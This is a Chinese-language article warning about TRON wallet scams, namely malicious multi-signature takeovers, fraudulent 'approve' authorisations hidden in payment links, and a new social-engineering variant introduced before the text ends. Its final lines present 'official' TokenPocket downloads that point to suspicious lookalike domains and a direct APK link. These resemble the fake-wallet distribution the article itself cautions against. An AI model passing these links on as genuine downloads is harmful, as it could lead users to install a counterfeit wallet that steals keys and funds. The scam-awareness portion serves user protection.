近段时间波场钱包被恶意多签的案例高发,在此之前,我们专门针对此类的诈骗方式做过警示,并分析了导致多签的几种场景。具体的可以查看《警惕 | 波场恶意更改权限骗局》和《假链接、假钱包骗局离我们有多远》这两篇文章。主要从假官网下载假钱包导致私钥助记词泄露被多签以及访问含有恶意代码的链接执行签名后被多签。所以我们再次提示用户不要使用搜索工具查找并使用钱包,也不要随意执行第三方不明来历的链接,尤其是一些验证码、增粉、买卡等平台的充值链接。
恶意授权特征
Approve即授权。它允许持有 Token 的用户,通过调用 Approve 方法,授权给指定账户一定额度,赋予该账户
自由支配额度内 Token 的权力。如果授权给
恶意账户,那么授权资产就会有极大风险。
通常我们接触的到恶意授权会使用链接的方式来“包装”,例如二维码识别后打开一个
仿冒的转账界面链接,当完成转账后就会被恶意授权;还有类似于一些验证码、增粉、买卡等平台的链接,在
充值过程中植入了恶意授权的代码在执行成功后就被
执行了恶意授权,恶意授权的Token会被盗取。
如果现在恶意授权换一种新的执行方式,你还可以分辨吗?
新型恶意授权骗局
对方会
主动联系你,声称可以解决你遇到的问题。例如你持有无法流通的Token,对方说可以通过
十六进制的方式帮你处理,他们不会问你索取私钥助记词,也不会给链接让你访问和签名,下面是一个诈骗案例的过程。
TokenPocket官方下载:
官网网址: https://tokenpocket.pink/
苹果下载链接https://cxgaz.xyz/f6Dols
安卓下载链接https://appxz.cyou/tokenpocket03.apk
